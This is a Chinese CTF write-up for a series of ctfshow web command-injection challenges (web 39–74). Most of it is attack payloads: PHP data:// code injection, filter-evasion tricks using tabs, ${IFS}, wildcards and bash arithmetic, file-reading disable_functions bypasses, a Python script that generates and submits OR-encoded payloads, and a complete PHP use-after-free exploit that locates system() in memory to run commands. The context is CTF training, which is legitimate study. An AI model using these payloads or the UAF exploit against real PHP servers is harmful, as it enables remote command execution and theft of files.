web 39
查看代码
还是利用php:data伪协议,和38差不多
Payload:?c=data://text/plain,<?php system('tac fla*.php');?>
web 40
直接给
Payload1:?c=show_source(next(array_reverse(scandir(current(localeconv())))));
通过货币信息(localeconv())取这个点(current())来到当前目录(scandir())把目录结果进行翻转(array_reverse())取向下一个,然后展示源码(show_source)
Payload2:
首先?c=print_r(get_defined_vars());
加POST数组(在POST中应加;1=phpinfo();)
利用对数组的操作next()
?c=print_r(next(get_defined_vars()));
获取数组值,对数组进行弹出array_pop()
?c=print_r(array_pop(next(get_defined_vars())));
执行一下eval(),改为1=system(‘ls’);
?c=eval(array_pop(next(get_defined_vars())));
再改为1=system(‘tac flag.php’);
web 41
这个给个链接:
ctfshow web入门 web41_羽的博客-CSDN博客
https://blog.csdn.net/miuzzx/article/details/108569080
再给个脚本:
?
import re
import requests
url=http://0d86a44b-b5b8-412f-acac-c6f39a87cf19.challenge.ctf.show/#改成自己的链接
a=[]
ans1=""
ans2=""
for i in range(0,256):
c=chr(i)
tmp = re.match(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-',c, re.I)
if(tmp):
continue
#print(tmp.group(0))
else:
a.append(i)
mya="system" #函数名 这里修改!
myb="ls" #参数
def myfun(k,my):
global ans1
global ans2
for i in range (0,len(a)):
for j in range(i,len(a)):
if(a[i]|a[j]==ord(my[k])):
ans1+=chr(a[i])
ans2+=chr(a[j])
return;
for k in range(0,len(mya)):
myfun(k,mya)
data1="(\""+ans1+"\"|\""+ans2+"\")"
ans1=""
ans2=""
for k in range(0,len(myb)):
myfun(k,myb)
data2="(\""+ans1+"\"|\""+ans2+"\")"
data={"c":data1+data2}
r=requests.post(url=url,data=data)
print(r.text)
??
?
运行脚本
在修改一下(ls改为cat flag.php)
得到flag。
web 42
采用双写绕过(直接cat flag.php也可以)
改一下
web 43
查看后发现分号和cat被过滤了,于是想到可以将分号改为%0a
web 44
多了一个flag过滤,利用通配符,拿到flag
web 45
空格也被过滤,用%09替代
Payload:?c=tac%09fla*%0A
web 46
增加数字,$与*
Payload:?c=tac%09fla?????%0A
web 47-49
统一的payload:?c=tac%09fla?????%0A
web 50-51
Payload:?c=nl<fla''g.php||
web 52
首先ls一下payload:c=ls${IFS}/||
再cat一下flag,payload:?c=nl${IFS}/fla\g||
web 53
后边有了分号,不需要||了,cat,tac被过滤。
Payload:?c=nl${IFS}fla\g.php
web 54
直接ls一下
然后payload:?c=paste${IFS}fla?.php
web 55-56
发现字母全被过滤了,然后在网上学习了无字母命令执行,wp有点长,单独写一篇.
web 57
看到flag再flag36.php中,只要构造出来36即可
${_} ="" //返回上一次命令
$((${_}))=0
$((~$((${_}))))=-1
echo $(()) #0
echo $((~$(()))) #~0是-1
$(($((~$(())))$((~$(()))))) #$((-1-1))即$$((-2))是-2
echo $((~-37)) #~-37是36所以
payload:
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
web 58
Payload:c=show_source('flag.php');
POST直接传参 c=show_source('flag.php');
绕过disable_functions系列:
查看目录下文件:
c=var_dump(scandir("/"));
c=print_r(scandir('./'));
c=print_r(scandir(dirname('__FILE__')));
通过单一函数读取文件:
c=echo file_get_contents("flag.php");
c=readfile("flag.php");
c=var_dump(file('flag.php'));
c=print_r(file('flag.php'));(file — 把整个文件读入一个数组中)
通过fopen去读取文件内容,这里介绍下函数
fread()、ets()、getc()、getss()、getcsv()、passthru()
payload:
c=$a=fopen("flag.php","r");while (!feof($a)) {$line =fgets($a);echo $line;}//一行一行读取
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}//一个一个字符读取
c=$a=fopen("flag.php","r");while (!feof($a)) {$line =fgetcsv($a);var_dump($line);}
通过高亮显示php文件:
show_source("flag.php");????????????
highlight_file("flag.php");?
web 59
查看当前目录下
然后高亮显示flag.php文件
web 60
Payload:c=show_source(‘flag.php’);或者c=highlight_file("flag.php");
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);print_r($line);}
web 61-65
查看当前目录:c=print_r(scandir(current(localeconv())));
payload:
c=show_source('flag.php');
c=highlight_file('flag.php');
c=highlight_file(next(array_reverse(scandir(current(localeconv())))));
web 66
本来还想查看当先目录文件,但发现
然后查看根目录下文件
看到flag.txt,show_source()函数被禁用,于是用highlight_file()函数
Payload总结:c=print_r(scandir("/"));
c=highlight_file('/flag.txt');
web 67
发现print_r函数被禁用
先查看根目录下文件:c=var_dump(scandir("/"));
然后POST:c=highlight_file('/flag.txt');
web 68-70
hint:尝试include('index.php');
发现字节太大了 直接盲猜 c=include('/flag.txt')
show_source()和highlight_file()被禁用
先查看根目录下问价
看到flag在flag.txt中
payload:c=include('/flag.txt')
69和70也可以用:c=include('/flag.txt')
web 71
Hint:我们可以执行php代码让后面的匹配缓冲区不执行直接退出 payload:c=include('/flag.txt');exit(0);
函数介绍:
ob_get_contents — 返回输出缓冲区的内容
ob_end_clean — 清空(擦除)缓冲区并关闭输出缓冲
payload:
c=require_once('/flag.txt');exit();这里通过exit();使程序提前退出,绕过后面的正则表达式
web 72
Payload:
c=?%3E%3C?php%20%0A%20%20%20%20$a=new%20directoryiterator(%22glob:///*%22);%20%0Aforeach($a%20as%20$f)%20%7B%0A%20%20%20%20echo($f-%3E__tostring().'%20');%20%0A%7D%20%0Aexit(0);%0A?%3E
然后就需要用到uaf脚本绕过,disable_function()限制了很多函数,可以直接用uaf脚本进行命令执行
c=function ctfshow($cmd) {
global $abc, $helper, $backtrace;
class Vuln {
public $a;
public function __destruct() {
global $backtrace;
unset($this->a);
$backtrace = (new Exception)->getTrace();
if(!isset($backtrace[1]['args'])) {
$backtrace = debug_backtrace();
}
}
}
class Helper {
public $a, $b, $c, $d;
}
function str2ptr(&$str, $p = 0, $s = 8) {
$address = 0;
for($j = $s-1; $j >= 0; $j--) {
$address <<= 8;
$address |= ord($str[$p+$j]);
}
return $address;
}
function ptr2str($ptr, $m = 8) {
$out = "";
for ($i=0; $i < $m; $i++) {
$out .= sprintf("%c",($ptr & 0xff));
$ptr >>= 8;
}
return $out;
}
function write(&$str, $p, $v, $n = 8) {
$i = 0;
for($i = 0; $i < $n; $i++) {
$str[$p + $i] = sprintf("%c",($v & 0xff));
$v >>= 8;
}
}
function leak($addr, $p = 0, $s = 8) {
global $abc, $helper;
write($abc, 0x68, $addr + $p - 0x10);
$leak = strlen($helper->a);
if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
return $leak;
}
function parse_elf($base) {
$e_type = leak($base, 0x10, 2);
$e_phoff = leak($base, 0x20);
$e_phentsize = leak($base, 0x36, 2);
$e_phnum = leak($base, 0x38, 2);
for($i = 0; $i < $e_phnum; $i++) {
$header = $base + $e_phoff + $i * $e_phentsize;
$p_type = leak($header, 0, 4);
$p_flags = leak($header, 4, 4);
$p_vaddr = leak($header, 0x10);
$p_memsz = leak($header, 0x28);
if($p_type == 1 && $p_flags == 6) {
$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
$data_size = $p_memsz;
} else if($p_type == 1 && $p_flags == 5) {
$text_size = $p_memsz;
}
}
if(!$data_addr || !$text_size || !$data_size)
return false;
return [$data_addr, $text_size, $data_size];
}
function get_basic_funcs($base, $elf) {
list($data_addr, $text_size, $data_size) = $elf;
for($i = 0; $i < $data_size / 8; $i++) {
$leak = leak($data_addr, $i * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x746e6174736e6f63)
continue;
} else continue;
$leak = leak($data_addr, ($i + 4) * 8);
if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
$deref = leak($leak);
if($deref != 0x786568326e6962)
continue;
} else continue;
return $data_addr + $i * 8;
}
}
function get_binary_base($binary_leak) {
$base = 0;
$start = $binary_leak & 0xfffffffffffff000;
for($i = 0; $i < 0x1000; $i++) {
$addr = $start - 0x1000 * $i;
$leak = leak($addr, 0, 7);
if($leak == 0x10102464c457f) {
return $addr;
}
}
}
function get_system($basic_funcs) {
$addr = $basic_funcs;
do {
$f_entry = leak($addr);
$f_name = leak($f_entry, 0, 6);
if($f_name == 0x6d6574737973) {
return leak($addr + 8);
}
$addr += 0x20;
} while($f_entry != 0);
return false;
}
function trigger_uaf($arg) {
$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
$vuln = new Vuln();
$vuln->a = $arg;
}
if(stristr(PHP_OS, 'WIN')) {
die('This PoC is for *nix systems only.');
}
$n_alloc = 10;
$contiguous = [];
for($i = 0; $i < $n_alloc; $i++)
$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
trigger_uaf('x');
$abc = $backtrace[1]['args'][0];
$helper = new Helper;
$helper->b = function ($x) { };
if(strlen($abc) == 79 || strlen($abc) == 0) {
die("UAF failed");
}
$closure_handlers = str2ptr($abc, 0);
$php_heap = str2ptr($abc, 0x58);
$abc_addr = $php_heap - 0xc8;
write($abc, 0x60, 2);
write($abc, 0x70, 6);
write($abc, 0x10, $abc_addr + 0x60);
write($abc, 0x18, 0xa);
$closure_obj = str2ptr($abc, 0x20);
$binary_leak = leak($closure_handlers, 8);
if(!($base = get_binary_base($binary_leak))) {
die("Couldn't determine binary base address");
}
if(!($elf = parse_elf($base))) {
die("Couldn't parse ELF header");
}
if(!($basic_funcs = get_basic_funcs($base, $elf))) {
die("Couldn't get basic_functions address");
}
if(!($zif_system = get_system($basic_funcs))) {
die("Couldn't get zif_system address");
}
$fake_obj_offset = 0xd0;
for($i = 0; $i < 0x110; $i += 8) {
write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
}
write($abc, 0x20, $abc_addr + $fake_obj_offset);
write($abc, 0xd0 + 0x38, 1, 4);
write($abc, 0xd0 + 0x68, $zif_system);
($helper->b)($cmd);
exit();
}
ctfshow("cat /flag0.txt");ob_end_flush();
#需要通过url编码哦
拿到flag。
web 73
根据上一题的经验,直接用glob伪协议。
payload:
c=?><?php
??? $a=new directoryiterator("glob:///*");
foreach($a as $f) {
??? echo($f->__tostring().' ');
}
exit(0);
?>
#?? glob:///*? 会列出根目录下的文件
# glob://*?? 会列出open_basedir允许目录下的文件
需要对其进行一次url编码
得到flagc.txt,再得到flag:
c=include('/flagc.txt');exit(0);
c=require("/flagc.txt");exit(0);
c=require_once("/flagc.txt");exit(0);
web 74
和上一题过程一样。
最终结果:
?